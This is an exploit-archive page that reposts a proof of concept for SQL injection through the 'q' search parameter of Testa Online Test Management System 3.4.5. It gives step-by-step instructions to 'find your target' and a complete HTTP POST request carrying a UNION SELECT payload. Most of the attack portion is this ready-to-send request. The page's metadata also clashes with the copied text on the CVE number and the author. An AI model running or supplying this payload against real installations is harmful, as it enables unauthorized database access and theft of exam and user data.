Advertisement






Testa Online Test Management System 3.4.5 - 'q' SQL Injection

CVE Category Price Severity
CVE-2020-10760 CWE-89 Not specified High
Author Risk Exploitation Type Date
Saeed Mohammadi Critical Remote 2021-08-03
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.039 0.89639

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080010

Below is a copy:

Testa Online Test Management System 3.4.5 - 'q' SQL Injection
# Exploit Title: Testa CMS 3.4.5 - 'q' SQL Injection
# Date: 2021-08-03 
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://testa.cc
# Version: v3.4.5
# Tested on: Winodws
# CVE: N/A
###########################################################
.:: Description ::.
Testa Helps You To make Online Exams.
###########################################################
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target Using Testa - Online Test Management System.
Step 2 - Click on List And Search Exams.
Step 3 - Inject Your Payloads in Search Field.
###########################################################
.:: Sample Request ::.
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost
Cookie: PHPSESSID=s1n2l3b5gp3o97mr9bh2uav7t6; testa_user2=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

p=1&q='+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,39,30,31,32,33,34,35,36,37,38,39-- -
###########################################################
TAPESH DIGITAL SECURITY TEAM IRAN T.ME/ICTUS_TM  |    


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.